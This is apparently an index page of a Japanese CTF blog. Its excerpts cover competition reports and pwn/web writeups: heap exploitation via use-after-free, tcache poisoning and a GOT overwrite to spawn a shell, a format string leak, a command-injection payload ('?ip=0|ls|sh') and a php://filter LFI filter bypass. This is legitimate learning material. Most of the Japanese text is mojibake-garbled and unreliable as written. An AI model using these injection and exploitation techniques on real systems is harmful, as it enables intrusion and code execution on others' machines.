ããã§ã¯ãäž»ã«Binary exploitation / pwnãªã©ã®CTFã®writeupããåŠç¿ããããšãæžããŸãã————If you want to see in English, you can click on the En button in the upper left corner.
RicercaCTF2023 writeup
ã¯ããã« 4/22ã«éå¬ãããRicercaCTF 2023ã«SUSH1st1ãšããŠåå ããŠã23äœã§ããã PwnãWebãããŸã解ããæããã£ãã 競æäžã«è§£ããåé¡ [pwn 97] BOFSec(107 solves) [web 95] Cat Café(113 solves) [misc 200] gatekeeper(21 solves) 競æåŸã«è§£ããåé¡ [web] tinyDB 競æäžã«è§£ããåé¡ [pwn 97] BOFSec 100%æ¬ç©ä¿èšŒ authored by ptr-yudai åé¡æŠèŠ ãŠãŒã¶ãŒã®is_adminã«ãã£ãŠãã©ã°ããããããããããªãã£ããããã ... //ïŒäžéšæç²ïŒ typedef struct { char name[0x100]; int is_admin; } auth_t; auth_t get_auth(void) { auth_t user = { .is_admin = 0 }; printf("Name: "); scanf("%s", user.name); return user; } int main() { char flag[0x100] = {}; auth_t user = get_auth(); if (user....
GCC 2023 in Singapore åå èš
ã¯ããã« 02/12 ãã 02/18 ã«éå¬ããã Global Cyber Camp in Singapore ã«åå ããŸããã æ¬èšäºã§ã¯ãGCC ãžã®å¿å段éããåå äžã®åºæ¥äºãææ³ãªã©ãæžããŸãã ããŸããŸãªæ°ã¥ããåºæ¥äºããã£ãã®ã§ãæåŸãŸã§ã芧ãã ããã Also, English version is here, please check it out! å¿åãããšã 2022 幎㮠11 æé ã« Twitter ã® TL ã« Global Cyber CampïŒä»¥äžãGCCïŒãšãããã®ããããšããã®ãæµããŠããŸãããåå ããŠã¿ãããªãšæã£ãã®ã§ãããå¿å課é¡ããã£ãã®ã§å¿åã¯åŸåãã«ããŠããŸããã ãµãšãGCC ã®å¿åæéã£ãŠãã€ãŸã§ã ã£ãïŒããš GCC ã®ååšãæãåºãã確èªãããšãã 2 æ¥åŸã§ãããåŸåãã«ããŠãã課é¡ã解çããŠå¿åããŸããã Global Cyber Camp ã«åå äž ãªã«ããã£ãã®ã ããã€ãã®å°è±¡ã«æ®ã£ãŠããè¬çŸ©ã«ã€ããŠç°¡åã«æžãããšæããŸãã åå çã«ãã PowerShell ãã«ãŠã§ã¢æ€ç¥ãšã³ãžã³ããã«ãœã³ïŒååïŒã§ã¯ãPowerShell ãã«ãŠã§ã¢ã®åºç€ã«ã€ããŠåŠç¿ããŸãããPowerShell ã䜿ãæ©äŒããããŸã§ãªãã£ãã®ã§ãããShinoBOT ãšããã·ãã¥ã¬ãŒã¿ãéããŠãã§ããããšãå€ããã ãªãšæããŸããã ãã®è¬çŸ©ã§ã¯ãã°ã«ãŒãã§æ€ç¥ãšã³ãžã³ãäœãå¿ èŠããããŸãããèšèªãå€ãããšæ®æ®µã®ããã«ã¯ã§ãããæ€èšããŠããäŒè©±ã«ã€ããŠããããæããã£ãã§ãã ãããŒã³ã»ãã¥ãªãã£ãšä¿¡å·è§£æãšããè¬çŸ©ããšãŠãå°è±¡ã«æ®ã£ãŠããŸããååã§ã¯ãéšå±ã®äžã瞊暪ç¡å°œã«ãããŒã³ãé£ã³ãããããšããæ©æã«ãã£ãŠå¶åŸ¡äžèœã«ãããšãããã®ãèŠãŸãããåŸåã§ã¯ãå°åã®ãããŒã³ãäœã£ãŠã¿ãŸãããéšå±ã«ã¯ããããã®ãããŒã³ããããå¹²æžããŠããã®ãããªããªãé£ã°ããªãã£ãã§ãããé£ã°ãããšãã¯ãšãŠãå¬ããã£ãã§ãã ä»ã«ããWeb ãããã¬ãŒã·ã§ã³ãã¹ãå ¥éã IDA ãçšã㊠C++ãã«ãŠã§ã¢ã®ãªããŒã¹ãšã³ãžãã¢ãªã³ã°ãªã©ããããªããŸããã ã©ã®ãããªè¬çŸ©ããã£ããã¯ããã¡ããã確èªã§ããŸãããŸããäžéšå€æŽãããè¬çŸ©ããããŸãã ããŸããŸãªåºæ¥äºã»æ°ã¥ã æŒé£äŒæ©ã«èª°ãããã«è©±ããããããPowerShell ãã«ãŠã§ã¢æ€ç¥ãšã³ãžã³ãäœã£ãŠããæ¥ä»¥å€ã¯ãå€ã¯èª°ããããšåºããããããŸããã Pronounciation-BattleïŒçºé³ããã«ïŒ ã·ã³ã¬ããŒã«äººããã¬ãŒã·ã¢äººãå°æ¹Ÿäººãéåœäººãæ¥æ¬äººã§å± é å±è¡ã®ãããªå Žæã§é£²ãããšã«ãªã£ãæ¥ããããŸããã 飲ã¿äŒã§ã²ãŒã ãã³ãŒã«ããããšãã話ã¯æ¥æ¬ã§ãèããããšããããŸãããå€åœã§ãåæ§ã®æåãããã¿ããã§ãããã®ã²ãŒã ã®äžçš®ãšã㊠Pronounciation-BattleïŒçºé³ããã«ïŒããããŸããã ã«ãŒã«ã¯ãèªåœã®èšèãããŒãã«ã§åããŠãæ£ããçºé³ã§ããªããã°ã©ã€ããåããŠãããŸãã5 ã©ã€ãå¶ã§ãã...
KOSENã»ãã¥ãªãã£ã³ã³ãã¹ã 2022 åå èš
ã¯ããã« 2022幎11æ19æ¥ã«ã1幎ã¶ãã«éå¬ãããé«å°ã»ãã¥ãªãã£ã³ã³ãã¹ãã«åå ããŸããã ãŸãããã®ã³ã³ãã¹ãã§ã¯å€éšã§åé¡ã®å 容ã»è§£æ³ãžã®èšåã¯çŠæ¢ãããŠããã®ã§ã åé¡ãžã®èšåãé¿ãã圢ã§æžãããšãäºããäºæ¿ãã ããã1 æºå @yu1hpaã @Yajirushiã @Shibakenã ãšããµããã®4人㧠SUSH1stïŒãããµããŒããšïŒãšããŠåå ããŸããã ãã€ãã®ã¡ã³ããŒ+αã§ããŒã ãçµã¿ãŸããã 競æåœæ¥ åœæ¥ã¯ãã¹ããã®çä¿¡é³ã§èµ·ããŸãããããããèµ·åºéšéæéããããŸããããéã«åããŸããã Pwnã¯é£ãããªããç¹ã«ååäžã¯ããªãã§åãã解ããŠããªããã ããããšãã£ãšæã£ãŠããŸããã ããããæãã ã£ãã®ã§ããã¹ã§å šå®ãéããã®ã¯æ®å¿µã§ããã ãŸãããšããµããã«ã¯äž»ã«ãããã¯ãŒã¯ã®åé¡ãä»»ããŠåé¡ã解ããŠããã£ãŠããŸããã ãã¹ãå匷ãæŸçœ®ããŠé«å°ã»ãã¥ã³ã³ã«åºãŠããŸãããcryptoåãå šç¶è§£ããªããŠææ²ããŸãã â shiba (@Shibak33333333n) November 19, 2022 ä»åã®ã³ã³ãã¹ãã§ã¯ãç¹ã«Shibakenã®åãå°ããããããšã Yajirushiãåãçºæ®ã§ããŠããªãã£ãã®ã¯çæã§ããã äžç·ã«åŠæ ¡ç掻ããŠãã®ã§ã圌ãã®åãã¯ããããã£ãŠããŸãã ãããããšãããããšæããŸãããä»æ¹ãªãã§ãã ããããã4人ã§éãŸã£ãŠã解ããŠããç¬éããšãŠãã¯ã¯ã¯ã¯ããŠããŠã æ¬åœã«æ¥œãããŸããïŒ çµæ é«å°ã»ãã¥ãªãã£ã³ã³ãã¹ããã€ããããŸã§ããïŒ çµæã¯2äœã§ããšãŠãæããã§ãã ... w/ @Shibak33333333n , @Yajirushi_314 , ãšããµãã â yu1hpa (@yu1hpa) November 20, 2022 1äœã«ã¯äžæ©å±ããã2äœã§çµããŸããã æåŸã« äœåã»éå¶ãªã©ãæ åœãããçæ§ã æè»ãªå¯Ÿå¿ãã¯ãããåœæ¥ã¯åæ»ãªã³ã³ãã¹ãã®éå¬ããããªã£ãŠããã ããããããšãããããŸããïŒ æ¬èšäºã¯é·éé«å°AdC 2022ã®3æ¥ç®ã®èšäºã§ãã éå¶ã«åãåããããããªã£ããšãããææ³ãåé¡åã¯å€§äžå€«ãšã®ããšã§ãã â©ïž
Flatt Security Developer's Quiz #2
https://twitter.com/flatt_security/status/1549710781918617600 æ¹é ãã€ãã§åºåãç¹ãã§ããã¡ã€ã«åã衚瀺ããŸãã ãã£ã«ã¿ãªã³ã°ãšã³ãã³ãã®å®è¡åŠç 以äžã®exec()ã¯ãã¹ã©ãã·ã¥ã§å²ãŸãããã¿ãŒã³ããã£ã«ã¿ãªã³ã°ããã®ã§ãå€ãã®èšå·ã䜿ããŸããã if(/[!@#$%\^&*()\-_+=\[\] {}'";:,:?~\\]/.exec(ip_address)){ res.send("Error! Your request is filtered!"); return; } ip_addressã«ãã£ã«ã¿ãªã³ã°ãåé¿ããã³ãã³ããå ¥åããããšã§å®è¡ãããŠããŸãããšãããããŸãã ãŸããexecSync()ã®åŠçããšã©ãŒã®å Žåãã¬ã¹ãã³ã¹ãè¿ã£ãŠããŸãã const cmd = "sh -c 'ping -c 1 " + ip_address + "' 2>&1 >/dev/null; true"; const stderr = execSync(cmd, {"timeout": 1000}); if(stderr != ""){ res.send("Error! " + stderr); return; } res.send("Your IP is in a good state!"); 解ç ãã€ã|ããã£ã«ã¿ãªã³ã°ããããªãããšã«æ°ã¥ãã®ã§ãããã䜿ã£ãŠç¹ãã§ãããŸãã https://2207okapi.twitter-quiz.flatt.training/?ip=0|ls|sh Error! sh: 1: main.js: not found sh: 2: node_modules: not found sh: 3: package-lock....
Flatt Security Developer's Quiz #1
https://twitter.com/flatt_security/status/1529416984785752065 æ¹é jsonã®ä»æ§ã§Unicodeæååãå±éãããã®ã§ãããã䜿ã£ãŠãã£ã«ã¿ãªã³ã°ãåé¿ããŸãã 次ã«php://filter/convert.base64-encodeã䜿ã£ãŠLocal File Inclusion(LFI)ãããŸãã file_get_contents(âphp://inputâ) 以äžã®php://inputã¯ãªã¯ãšã¹ãã®bodyããçã®ããŒã¿ãèªã¿èŸŒãããšãã§ãã file_get_contents()ã¯ãã¡ã€ã«ã®å 容ãæååã«èªã¿èŸŒããŸãã $query = file_get_contents("php://input"); ãã£ã«ã¿ãªã³ã°ã®åé¿æ¹æ³ã®æ€èš 次ã®$filter_listã§ãã£ã«ã¿ãªã³ã°ãããŠããæååã¯ã PHPã®wrapperãšãããã®ã«å«ãŸããŠããŸãã ãã®ãã£ã«ã¿ãjsonã®Unicodeæååã䜿ã£ãŠåé¿ããŸãã ãŸãã以äžã®ããã«stripos()ã䜿ãããŠããã®ã§ã 倧æåã§åé¿ããããšãã§ããŸããã stripos â Find the position of the first occurrence of a case-insensitive substring in a string foreach ($filter_list as $filter) { if(stripos($query, $filter) !== false) { exit("Filtered!"); } } LFIã®æ€èš 次ã®json_decode($query, true)['fn']ã®éšåã¯ã {"fn": "hoge"}ã®ãããªjson圢åŒãæ±ããããŠããŸãã "hoge"ã®éšåã«php://...ãšããPHPã®supported protocol/wrapperãäžããŠã LFIãããšããã®ãããã®åé¡ã®è§£æ³ã§ãã $output = file_get_contents(json_decode($query, true)['fn']); ãŸããLFIã§èªã¿èŸŒãã ãã¡ã€ã«ã«<?phpãšããæååããããšçµäºããŠããŸãã®ã§ã php://filter/convert.base64-encodeã䜿ã£ãŠbase64ã§ãšã³ã³ãŒãããæååãåºåããŸãã ãã£ã«ã¿ãªã³ã°ã®åé¿ãšLFI Using php://filter for local file inclusionãåèã«ããŠæ¬¡ã®ãããªURLãèããŸãã php://filter/convert.base64-encode/resource=index.php ãã®URLã«ã¯ãã£ã«ã¿ãªã³ã°ãããŠããæåãå«ãŸããã®ã§ããããUnicodeæååã«çœ®ãæããŸãã...
babyheap - FireShellCTF 2019
æ¹é Use After Freeã§fdãæžãæããããšã§ã.bss+0x20(ã°ããŒãã«å€æ°ã®ã¢ãã¬ã¹)ãtcacheã«ç¹ãã ãã®ãšãã«ãã¹ãŠã®ã°ããŒãã«å€æ°ãåæåããã ãŸããatoi@gotãsystemã«åããŠãsystem("/bin/sh")ãåŒã³åºãã Use After Free freeããé åã®fdã.bss+0x20ã§æžãæããã ïŒæåã«freeããé åã0ãšè¡šèšããïŒ tcache: 0 -> (.bss+0x20) -> NULL create() delete() edit(p64(e.bss()+0x20)) # 0x6020a0 ãªã.bss+0x20ã®ã¢ãã¬ã¹ãç¹ãã®ã åçš®ãã©ã°ããmallocããŠè¿ã£ãŠããé åã.bssã«çœ®ãããŠããŸãã ãããã£ãŠãåçš®ãã©ã°ã®ååæåãã è¿ã£ãŠããé åã«ä»»æã®ã¢ãã¬ã¹ãæžã蟌ã¿ãããããã§ãã .bss sectionã®ã¢ãã¬ã¹ gef†xfiles Start End Name File 0x00000000003ff270 0x00000000003ff450 .dynamic /ctf/yu1hpa/019/FireShell/babyheap/babyheap : : : 0x0000000000602080 0x00000000006020d0 .bss /ctf/yu1hpa/2019/FireShell/babyheap/babyheap ãã£ãŠãbssã»ã¯ã·ã§ã³ã¯0x602080ããå§ãŸãã åçš®ãã©ã°ã®åæåãšlibc leakã®æ create -> edit -> show -> deleteãããæã§ãã æåŸã«deleteãããŠããããšãšãé ãã³ãã³ãfillã¯äœ¿ã£ãŠãªãã®ã§ããã©ã°ãç«ã£ãŠããŸããã ïŒãã³ã³ãã€ã©ã䜿ã£ãŠãåã¢ãã¬ã¹ãã©ã®ãã©ã°ãã確èªã§ããŸããïŒ 0x6020a0: 0x0000000000000000 0x0000000000000001 0x6020b0: 0x0000000000000001 0x0000000000000001 0x6020c0: 0x0000000000000000 0x0000000000603260 0x6020a0: create 0x6020a8: edit 0x6020b0: show 0x6020b8: delete 0x6020c0: fill 0x6020c8: mallocãããšãã«è¿ã£ãŠããé å ããšã¯fillã§....
heap_challenge - CPCTF 2022
æ¹é unsorted binã«ããlibc leakãšãHouse of botcake äºåæºå # def new(index: str, msg: str, content: bytes) new("0", "16", b"AAAA") new("1", "1280", b"BBBB") new("2", "16", b"CCCC") new("3", "16", b"DDDD") new("4", "16", b"EEEE") new("5", "16", b"FFFF") unsorted binã«ããlibc leakã®æ unsorted binã®fdã¯ãmain_arena.topãæãã topã¡ã³ãã®äœçœ®ãšãlibcã®äžã«çœ®ãããmain_arenaã®äœçœ®ããããã°ãlibc base addressãæ±ããããšãã§ããã ïŒäžåºŠmallocããªããštopã«ã¢ãã¬ã¹ãå ¥ããªãã®ã§ããããŸã§é²ãããïŒ gef†heap arena Arena (base=0x7ffff7fc1b80, top=0x55555555b2d0, last_remainder=0x0, next=0x7ffff7fc1b80, next_free=0x0, system_mem=0x21000) 次ã«ãlibcã®é 眮ãããŠããå Žæã¯0x00007ffff7dd5000ã§ããã gef†vm : 0x00007ffff7dd5000 0x00007ffff7df7000 0x0000000000000000 r-- /ctf/yu1hpa/2022/CPCTF/heap_chal/libc.so.6 ãããã£ãŠãmain_arenaãšã®ãªãã»ããã¯ã 0x7ffff7fc1b80 - 0x00007ffff7dd5000 = 0x1ecb80 ãŸããtopã¡ã³ãã®äœçœ®ã¯æ¬¡ã®ããã«ç¢ºèªããããšãã§ããã gef†x/16xg 0x7ffff7fc1b80 0x7ffff7fc1b80: 0x0000000000000000 0x0000000000000000 0x7ffff7fc1b90: 0x0000000000000000 0x0000000000000000 0x7ffff7fc1ba0: 0x0000000000000000 0x0000000000000000 0x7ffff7fc1bb0: 0x0000000000000000 0x0000000000000000 0x7ffff7fc1bc0: 0x0000000000000000 0x0000000000000000 0x7ffff7fc1bd0: 0x0000000000000000 0x0000000000000000 0x7ffff7fc1be0: 0x000055555555b2d0 0x0000000000000000 0x7ffff7fc1bf0: 0x00007ffff7fc1be0 0x00007ffff7fc1be0 top=0x55555555b2d0ã¯main_arena(0x7ffff7fc1b80)<+96> ã®äœçœ®ã«ããããšããããã®ã§ãlibc base addressã¯ä»¥äžã®ããã«æ±ãŸãã...
fastbin_tutorial - InterKosenCTF2019
æ¹é å ¬åŒwriteupã§ã¯ãUse After Freeã§ãã£ãŠããã®ã§ããã Double Free Tutorial!ãšåºãŠããã®ã§ãdouble freeãšfastbin unlink attackããããŸãã 泚æç¹ æåã«äžããããflagã®ã¢ãã¬ã¹ãã0x10ãåŒããªããã°ãªããªãã char *flag; : void setup(void) { setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); FILE *f = fopen("flag.txt", "r"); flag = malloc(0x50); if (f == NULL) { puts("[WARN] Please report this bug to the author."); exit(1); } fread(flag, 1, 0x50, f); fclose(f); malloc(0x100); // assure no leak by freed FILE buffer } äžããããã¢ãã¬ã¹ã«çŽæ¥ç¹ããšãOops! You forgot the overhead...?ãšæããŠãããã flagã¯ãmallocã§ç¢ºä¿ãããŠããã®ã§ãæ¬æ¥ã®ãã£ã³ã¯ãã+0x10ã®ã¢ãã¬ã¹ãè¿ã£ãŠããŠãããmalloc.c L1126 fastbin ã« addr_flagãç¹ã ãããã£ã³ã¯ã«å¯ŸããŠå ±æç¶æ ãäœã£ãŠããã®ãã£ã³ã¯ãè¿ã£ãŠãããšãã«addr_flagãè¿ã£ãŠããããã«ããŸãã...
shopkeeper - InterKosenCTF2019
æ¹é shopé¢æ°å ã«ããmoneyãšããå€æ°ãStack Overflowã«ãã£ãŠæžãæããŠã ååãªmoneyãæã«ããŠãHopesãè²·ãæ¹æ³ãåããŸãã è匱æ§ãæ¢ãæ ð äžã€ã®è匱æ§ã¯ãreadlineé¢æ°ã§ç¡éã«å ¥åã§ããããšã§ãã void readline(char *buf) { char *ptr; for(ptr = buf; ; ++ptr) { // Vulnerable here if (read(0, ptr, 1) == 0) break; if (*ptr == '\n') { *ptr = 0x00; break; } } } ããäžã€ã¯ãæååæ¯èŒã§strcmpé¢æ°ã䜿ã£ãŠããããšã§ãã void shop(item_t *inventory) { char buf[LEN_NAME]; item_t *p, *t; int money = 100; ãŸããshopé¢æ°ã®äžã§ãmoneyãããŒã«ã«å€æ°ãšããŠå®çŸ©ãããŠããã®ã§ã æžãæããããšãã§ããå Žæãæ¢ããŸãã strcmpé¢æ°ã¯'\0'ããæ¯èŒããªã shopé¢æ°ã®äžã§åŒã°ããŠããpurchaseé¢æ°ã§ã¯ã æååæ¯èŒã«ãstrcmpé¢æ°ã䜿ãããŠããŸããã ããã¥ã¢ã«ãèŠããšã次ã®ããã«æžãããŠããŸãã strncmp() is designed for comparing strings rather than binary data, characters that appear after a `\0' character are not compared....
uma_catch - SECCON Beginners CTF 2021
uma_catch - SECCON BeginnersCTF2021(My solver) æ¹é Format Strings Bug ã«ãã£ãŠlibcå ã®ã¢ãã¬ã¹ããªãŒã¯ãã tcache poisoningã§Shellãåãã FSBã«ããlibc leak src.cã®197è¡ç®ã®showé¢æ°ã§ã¯ã ãã©ãŒãããæå®åãããŠããªãããšã«ããFSBãèµ·ããã void show() { printf(list[get_index()]->name); } __libc_start_mainå ã®ã¢ãã¬ã¹ãæ¢ãæ 次ã«ã__libc_start_mainã®ã¢ãã¬ã¹ã調ã¹ãã 以äžã®ããã«èª¿ã¹ãããšãã§ããã gef†disass __libc_start_main Dump of assembler code for function __libc_start_main: 0x00007ffff7a03b10 <+0>: push r13 0x00007ffff7a03b12 <+2>: push r12 ïŒäžç¥ïŒ 0x00007ffff7a03bf0 <+224>: mov rax,QWORD PTR [rsp+0x18] 0x00007ffff7a03bf5 <+229>: call rax 0x00007ffff7a03bf7 <+231>: mov edi,eax 0x00007ffff7a03bf9 <+233>: call 0x7ffff7a25240 <exit> 0x00007ffff7a03bfe <+238>: mov rax,QWORD PTR [rip+0x3ceda3] # 0x7ffff7dd29a8 ïŒäžç¥ïŒ 0x00007ffff7a03cc3 <+435>: call QWORD PTR [rdx+0x168] 0x00007ffff7a03cc9 <+441>: jmp 0x7ffff7a03ba5 <__libc_start_main+149> End of assembler dump....